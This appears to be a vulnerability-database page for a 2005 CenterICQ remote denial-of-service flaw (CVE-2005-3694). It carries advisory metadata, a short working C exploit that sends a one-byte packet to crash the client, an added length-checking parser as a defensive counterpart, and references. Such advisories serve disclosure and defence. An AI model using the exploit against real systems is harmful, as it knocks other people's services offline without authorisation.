CenterICQ Malformed Packet Handling Remote Denial-of-Service Vulnerability

Vulnerability ID: 1109335    Vulnerability type: Other
Published: 2005-11-29    Updated: 2006-04-11
CVE ID: CVE-2005-3694    CNNVD-ID: CNNVD-200511-279
Platform: Linux    CVSS score: 7.8
|Vulnerability Source
https://www.exploit-db.com/exploits/26666
https://www.securityfocus.com/bid/15649
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200511-279
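|Vulnerability Details
CenterICQ is an instant messaging program. centericq 4.20.0-r3, when "Enable peer-to-peer communications" is set, allows remote attackers to cause a denial of service (segmentation fault and crash) via short zero-length packets, and possibly packets of length 1 or 2, as demonstrated using Nessus.
|Exploit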
source: http://www.securityfocus.com/bid/15649/info

CenterICQ is prone to a remote denial-of-service vulnerability.

The vulnerability presents itself when the client is running on a computer that is directly connected to the Internet and handles malformed packets on the listening port for ICQ messages.

A successful attack can cause the client to crash. 

#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>   // inet_addr()

#define DEST_IP   "192.168.1.33"
#define DEST_PORT 7777

    int main(void)
    {
        int sockfd;
        struct sockaddr_in dest_addr;   // will hold the destination addr

        sockfd = socket(AF_INET, SOCK_STREAM, 0); // do some error checking!

        dest_addr.sin_family = AF_INET;          // host byte order
        dest_addr.sin_port = htons(DEST_PORT);   // short, network byte order
        dest_addr.sin_addr.s_addr = inet_addr(DEST_IP);
        memset(&(dest_addr.sin_zero), '\0', 8);  // zero the rest of the struct

        // don't forget to error check the connect()!
        connect(sockfd, (struct sockaddr *)&dest_addr, sizeof(struct sockaddr));

        char msg[] = { 0x01 };                   // the single byte that is sent
        send(sockfd, msg, 1, 0);
        return 0;
    }
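
The defensive counterpart to the short packets described above, as an added example that is not centericq's code and is not taken from the advisory: a receive-side check that refuses to touch payload bytes until the length is validated. The framing (2-byte little-endian length prefix, first payload byte as a type), the limits, and the names parse_frame and struct frame are assumptions made for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Assumed framing for illustration only (not taken from centericq):
 * 2-byte little-endian payload length, then payload; payload[0] is a type. */
#define HDR_LEN      2u
#define MIN_PAYLOAD  1u
#define MAX_PAYLOAD  8192u

enum frame_status { FRAME_OK, FRAME_NEED_MORE, FRAME_REJECT };

struct frame {
    uint8_t        type;      /* first payload byte */
    const uint8_t *body;      /* bytes after the type */
    size_t         body_len;
};

/* Validate before reading any payload byte. peer_closed means recv() returned 0,
 * so a frame that is still incomplete can never be completed and is dropped. */
enum frame_status parse_frame(const uint8_t *buf, size_t len, int peer_closed,
                              struct frame *out)
{
    if (len < HDR_LEN)                           /* 0 or 1 byte received */
        return peer_closed ? FRAME_REJECT : FRAME_NEED_MORE;

    size_t declared = (size_t)buf[0] | ((size_t)buf[1] << 8);
    if (declared < MIN_PAYLOAD || declared > MAX_PAYLOAD)
        return FRAME_REJECT;                     /* zero-length or oversized */

    if (len - HDR_LEN < declared)                /* truncated payload */
        return peer_closed ? FRAME_REJECT : FRAME_NEED_MORE;

    out->type     = buf[HDR_LEN];                /* safe: declared >= 1 */
    out->body     = buf + HDR_LEN + 1;
    out->body_len = declared - 1;
    return FRAME_OK;
}

int main(void)
{
    /* Constructed input: a single 0x01 byte followed by connection close. */
    const uint8_t one[] = { 0x01 };
    struct frame f;
    printf("1 byte + EOF -> %d\n", parse_frame(one, sizeof one, 1, &f));
    return 0;
}
```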
|Affected Products
Gentoo Linux Centericq Centericq 4.20 + Debian Linux 3.1 sparc + Debian Linux 3.1 s/390 + Debian
|References

Source: bugs.gentoo.org
Link: https://bugs.gentoo.org/show_bug.cgi?id=100519
Source: bugs.debian.org
Link: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=334089
Source: XF
Name: centericq-zero-length-dos(23327)
Link: http://xforce.iss.net/xforce/xfdb/23327
Source: BID
Name: 15649
Link: http://www.securityfocus.com/bid/15649
Source: OSVDB
Name: 21270
Link: http://www.osvdb.org/21270
Source: DEBIAN
Name: DSA-912
Link: http://www.debian.org/security/2005/dsa-912
Source: GENTOO
Name: GLSA-200512-11
Link: http://security.gentoo.org/glsa/glsa-200512-11.xml
Source: SECUNIA
Name: 18081
Link: http://secunia.com/advisories/18081
Source: SECUNIA
Name: 17818
Link: http://secunia.com/advisories/17818
Source: SECUNIA
Name: 17798
Link: http://secunia.com/advisories/17798